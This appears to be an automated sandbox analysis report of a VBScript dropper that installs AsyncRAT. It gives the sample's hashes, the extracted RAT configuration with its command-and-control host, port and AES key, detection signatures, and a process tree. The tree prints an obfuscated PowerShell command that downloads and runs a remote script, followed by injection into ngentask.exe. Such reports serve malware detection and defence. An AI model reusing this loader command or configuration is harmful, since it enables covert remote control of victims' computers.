Analysis
-
max time kernel
66s -
max time network
163s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
25-07-2021 06:22
Static task
static1
Behavioral task
behavioral1
Sample
LUID618.vbs
Resource
win7v20210408
General
-
Target
LUID618.vbs
-
Size
662B
-
MD5
a39f9093ecdceb92cf629cd5764dd1d2
-
SHA1
1942c681159cbbce82dc7388b0de29b984f43bd8
-
SHA256
83d832887ed1b0af95ca14e647463251f0c9660971fddb03d3959647d6faee4d
-
SHA512
c18fd694af943cdc74a0679fe43214afb9c652a5e53dca386e631d765449e64bff524809ef2a7923843272dc9040a080028e4f1709eb37b95723b14443521c1a
Malware Config
Extracted
asyncrat
0.5.7B
newfrost.ddns.net:6666
AsyncMutex_6SI8OkPnk
-
aes_key
i7qGeRW2Orm1I0pgfxYOISTcRoWU7fSK
-
anti_detection
false
-
autorun
false
-
bdos
false
-
delay
Default
-
host
newfrost.ddns.net
-
hwid
3
- install_file
-
install_folder
%AppData%
-
mutex
AsyncMutex_6SI8OkPnk
-
pastebin_config
null
-
port
6666
-
version
0.5.7B
Signatures
-
suricata: ET MALWARE Observed Malicious SSL Cert (AsyncRAT Server)
-
Async RAT payload 2 IoCs
Processes:
resource yara_rule behavioral2/memory/196-361-0x0000000000400000-0x0000000000412000-memory.dmp asyncrat behavioral2/memory/196-362-0x000000000040C73E-mapping.dmp asyncrat -
Blocklisted process makes network request 4 IoCs
Processes:
powershell.exeflow pid process 8 1172 powershell.exe 12 1172 powershell.exe 19 1172 powershell.exe 20 1172 powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 688 set thread context of 196 688 powershell.exe ngentask.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 10 IoCs
Processes:
powershell.exepowershell.exepid process 1172 powershell.exe 1172 powershell.exe 1172 powershell.exe 688 powershell.exe 688 powershell.exe 688 powershell.exe 688 powershell.exe 688 powershell.exe 688 powershell.exe 688 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exepowershell.exengentask.exedescription pid process Token: SeDebugPrivilege 1172 powershell.exe Token: SeDebugPrivilege 688 powershell.exe Token: SeDebugPrivilege 196 ngentask.exe -
Suspicious use of WriteProcessMemory 18 IoCs
Processes:
WScript.exepowershell.exepowershell.exedescription pid process target process PID 3944 wrote to memory of 1172 3944 WScript.exe powershell.exe PID 3944 wrote to memory of 1172 3944 WScript.exe powershell.exe PID 1172 wrote to memory of 688 1172 powershell.exe powershell.exe PID 1172 wrote to memory of 688 1172 powershell.exe powershell.exe PID 688 wrote to memory of 2284 688 powershell.exe ngentask.exe PID 688 wrote to memory of 2284 688 powershell.exe ngentask.exe PID 688 wrote to memory of 2284 688 powershell.exe ngentask.exe PID 688 wrote to memory of 2248 688 powershell.exe ngentask.exe PID 688 wrote to memory of 2248 688 powershell.exe ngentask.exe PID 688 wrote to memory of 2248 688 powershell.exe ngentask.exe PID 688 wrote to memory of 196 688 powershell.exe ngentask.exe PID 688 wrote to memory of 196 688 powershell.exe ngentask.exe PID 688 wrote to memory of 196 688 powershell.exe ngentask.exe PID 688 wrote to memory of 196 688 powershell.exe ngentask.exe PID 688 wrote to memory of 196 688 powershell.exe ngentask.exe PID 688 wrote to memory of 196 688 powershell.exe ngentask.exe PID 688 wrote to memory of 196 688 powershell.exe ngentask.exe PID 688 wrote to memory of 196 688 powershell.exe ngentask.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\LUID618.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec Bypass gdr -*;Set-Variable 5 (&(Get-Item Variable:/E*t).Value.InvokeCommand.(((Get-Item Variable:/E*t).Value.InvokeCommand|Get-Member|?{(DIR Variable:/_).Value.Name-ilike'*ts'}).Name).Invoke('*w-*ct')Net.WebClient);Set-Variable S 'https://bit.ly/3x1bIxK'; (Get-Item Variable:/E*t).Value.InvokeCommand.InvokeScript((GCI Variable:5).Value.((((GCI Variable:5).Value|Get-Member)|?{(DIR Variable:/_).Value.Name-ilike'*wn*g'}).Name).Invoke((GV S -ValueO)))2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windo 1 -noexit -exec bypass -file C:\Users\Public\ToT.ps13⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe"4⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe"4⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe"4⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Public\ToT.ps1MD5
8f8c2450bc9cffbd58c9f5b636352117
SHA1ca15532c513d81cd0ce02d15215a92cb0de02161
SHA256a0e4c425360270c90af50799d89a5f5c011d7108c92deeba06c8c1cf180ae4d1
SHA512f342b2ac3c55b3a72375526c900cf2273556d81dceab97c32e0ddc1c194fffcd3418a1348431b1e1b044784354eb9b9a8d5f6987fd4397650d693c36367ed98a
-
memory/196-379-0x0000000006890000-0x0000000006891000-memory.dmpFilesize
4KB
-
memory/196-384-0x0000000006F40000-0x0000000006F41000-memory.dmpFilesize
4KB
-
memory/196-382-0x0000000006D50000-0x0000000006DDD000-memory.dmpFilesize
564KB
-
memory/196-381-0x0000000006900000-0x0000000006904000-memory.dmpFilesize
16KB
-
memory/196-380-0x0000000006990000-0x0000000006991000-memory.dmpFilesize
4KB
-
memory/196-373-0x0000000005000000-0x0000000005001000-memory.dmpFilesize
4KB
-
memory/196-378-0x0000000006710000-0x0000000006789000-memory.dmpFilesize
484KB
-
memory/196-383-0x0000000006EE0000-0x0000000006F39000-memory.dmpFilesize
356KB
-
memory/196-377-0x0000000006790000-0x0000000006791000-memory.dmpFilesize
4KB
-
memory/196-376-0x0000000005950000-0x0000000005951000-memory.dmpFilesize
4KB
-
memory/196-375-0x0000000005E50000-0x0000000005E51000-memory.dmpFilesize
4KB
-
memory/196-374-0x00000000058B0000-0x00000000058B1000-memory.dmpFilesize
4KB
-
memory/196-361-0x0000000000400000-0x0000000000412000-memory.dmpFilesize
72KB
-
memory/196-362-0x000000000040C73E-mapping.dmp
-
memory/688-311-0x0000000000000000-mapping.dmp
-
memory/688-356-0x000001DDAEF96000-0x000001DDAEF98000-memory.dmpFilesize
8KB
-
memory/688-355-0x000001DDC9150000-0x000001DDC915E000-memory.dmpFilesize
56KB
-
memory/688-350-0x000001DDAEF93000-0x000001DDAEF95000-memory.dmpFilesize
8KB
-
memory/688-349-0x000001DDAEF90000-0x000001DDAEF92000-memory.dmpFilesize
8KB
-
memory/688-336-0x000001DDC9110000-0x000001DDC9111000-memory.dmpFilesize
4KB
-
memory/1172-114-0x0000000000000000-mapping.dmp
-
memory/1172-310-0x000002A679816000-0x000002A679818000-memory.dmpFilesize
8KB
-
memory/1172-127-0x000002A67BA00000-0x000002A67BA01000-memory.dmpFilesize
4KB
-
memory/1172-122-0x000002A679813000-0x000002A679815000-memory.dmpFilesize
8KB
-
memory/1172-121-0x000002A679810000-0x000002A679812000-memory.dmpFilesize
8KB
-
memory/1172-120-0x000002A679740000-0x000002A679741000-memory.dmpFilesize
4KB